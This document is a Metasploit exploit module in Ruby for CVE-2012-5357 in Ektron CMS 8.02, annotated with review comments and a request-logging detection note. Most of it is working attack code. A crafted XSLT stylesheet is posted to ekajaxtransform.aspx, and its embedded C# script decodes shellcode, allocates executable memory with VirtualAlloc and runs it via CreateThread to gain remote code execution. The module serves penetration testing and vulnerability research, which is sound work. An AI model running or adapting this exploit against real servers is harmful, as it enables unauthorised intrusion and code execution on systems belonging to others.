GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Ektron CMS 8.02 (before SP5): the ekajaxtransform.aspx endpoint feeds a
  # caller-supplied stylesheet to XslCompiledTransform, and that stylesheet may
  # carry an <msxsl:script language="C#"> block which the server compiles and
  # runs (CVE-2012-5357). Both #check and #exploit depend on exactly that: the
  # response must echo a random marker returned by the script's xml() function.
  #
  # Detection note: every request this module sends is a POST to
  # WorkArea/ContentDesigner/ekajaxtransform.aspx whose `xslt` form field
  # contains an msxsl:script element; that combination is a narrow signature
  # for request logging on the CMS host.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata and datastore options.
  #
  # Registers TARGETURI (base path of the CMS, default '/cms400min/') and
  # HTTP_DELAY. NOTE(review): nothing in this class reads
  # datastore['HTTP_DELAY'], and its description mentions a "VBS payload
  # request" this module never makes — the option looks like a leftover.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',
        'Description' => %q{
          This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
          vulnerability exists due to the insecure usage of XslCompiledTransform, using a
          XSLT controlled by the user. The module has been tested successfully on Ektron CMS
          8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
          SERVICE privileges.
        },
        'Author' => [
          'Rich Lundeen', # Vulnerability discovery
          'juan vazquez', # Metasploit module
          'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-5357'],
          [ 'OSVDB', '88107' ],
          [ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
        ],
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Privileged' => true,
        'Targets' => [
          ['Windows 2003 SP2 / Ektron CMS400 8.02', {}],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-10-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
      ]
    )
  end

  # Vulnerability check: posts a minimal stylesheet whose C# script returns a
  # random alphabetic marker and looks for that marker in a 200 response.
  #
  # A Vulnerable verdict therefore means the server compiled and ran the
  # embedded script (the script only returns a string) — a side effect worth
  # recording against the UNKNOWN_SIDE_EFFECTS note above. The marker is
  # interpolated into a Regexp below; that is only safe because
  # rand_text_alpha yields letters and never regex metacharacters.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the marker is echoed and
  #   the body contains no "Error", Safe otherwise (including no response)
  def check
    fingerprint = rand_text_alpha(5 + rand(5)) # 5..9 letters, echoed by xml() below
    # Runtime string: the heredoc body is sent verbatim as the `xslt` form field.
    xslt_data = <<~XSLT
      <?xml version='1.0'?>
      <xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">
      <msxsl:script language="C#" implements-prefix="user">
      <![CDATA[
      public string xml()
      {
      return "#{fingerprint}";
      }
      ]]>
      </msxsl:script>
      <xsl:template match="/">
      <xsl:value-of select="user:xml()"/>
      </xsl:template>
      </xsl:stylesheet>
    XSLT

    # Same request shape as #exploit: the `xml` field is throwaway input, the
    # `xslt` field carries the stylesheet, Referer comes from build_referer.
    res = send_request_cgi(
      {
        'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'vars_post' => {
          "xml" => rand_text_alpha(5 + rand(5)),
          "xslt" => xslt_data
        }
      }
    )

    # "Error" anywhere in the body (not only in an error page) forces Safe.
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Base path of the CMS with a guaranteed trailing slash; prefixes the
  # ekajaxtransform.aspx URI and the Referer header.
  #
  # NOTE(review): `<<` appends to the String object returned by
  # target_uri.path rather than to a copy. If that object is shared (cached by
  # target_uri), the slash is written into it on the first call and later calls
  # find it already present. Harmless for this module, but
  # `path.end_with?('/') ? path : "#{path}/"` would avoid mutating state the
  # method does not own. The local variable shadows the method name inside the
  # body.
  #
  # @return [String] the TARGETURI path ending in "/"
  def uri_path
    uri_path = target_uri.path
    uri_path << "/" if uri_path[-1, 1] != "/" # last character, nil for an empty path
    uri_path
  end

  # Referer header value: "<scheme>://<rhost>:<rport><uri_path>", scheme chosen
  # from the SSL option. Both requests send it; why the endpoint wants it is
  # not visible here — presumably a same-origin check on the server, confirm
  # against the application.
  #
  # NOTE(review): rhost is inserted verbatim, so an IPv6 literal would not be
  # bracketed. The scheme literal is appended to in place with `<<` below;
  # adding `# frozen_string_literal: true` to this file would make that raise.
  #
  # @return [String] Referer header value
  def build_referer
    if datastore['SSL']
      schema = "https://"
    else
      schema = "http://"
    end

    referer = schema
    referer << rhost
    referer << ":#{rport}"
    referer << uri_path
    referer
  end

  # Delivers the payload. The stylesheet's C# script decodes the base64 of
  # payload.encoded, places it in memory allocated with VirtualAlloc
  # (PAGE_EXECUTE_READWRITE), starts a thread at it with CreateThread, and
  # returns the marker so the HTTP response can confirm the script ran.
  #
  # NOTE(review): no EXE is generated despite the status message — the raw
  # encoded payload is embedded in the stylesheet — and none of the
  # Msf::Exploit::EXE mixin methods are called in this class; both look like
  # leftovers. The request and the success test are identical to #check and
  # could share a helper.
  #
  # @raise fail_with(Failure::Unknown) when there is no response, the status is
  #   not 200, the marker is absent, or the body contains "Error"
  # @return [void]
  def exploit
    print_status("Generating the EXE Payload and the XSLT...")
    fingerprint = rand_text_alpha(5 + rand(5)) # 5..9 letters, echoed by xml() below

    # Runtime string: the heredoc body (with the base64 payload interpolated)
    # is sent verbatim as the `xslt` form field.
    xslt_data = <<~XSLT
      <?xml version='1.0'?>
      <xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">
      <msxsl:script language="C#" implements-prefix="user">
      <![CDATA[

      private static UInt32 MEM_COMMIT = 0x1000;
      private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

      public string xml()
      {
      string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
      byte[] shellcode = System.Convert.FromBase64String(shellcode64);
      UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
      IntPtr hThread = IntPtr.Zero;
      IntPtr pinfo = IntPtr.Zero;
      UInt32 threadId = 0;
      hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
      return "#{fingerprint}";
      }
      ]]>
      </msxsl:script>
      <xsl:template match="/">
      <xsl:value-of select="user:xml()"/>
      </xsl:template>
      </xsl:stylesheet>
    XSLT

    print_status("Trying to run the xslt transformation...")
    res = send_request_cgi(
      {
        'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'vars_post' => {
          "xml" => rand_text_alpha(5 + rand(5)),
          "xslt" => xslt_data
        }
      }
    )
    # Same verdict logic as #check: marker present, no "Error" in the body.
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      print_good("Exploitation was successful")
    else
      fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
    end
  end
end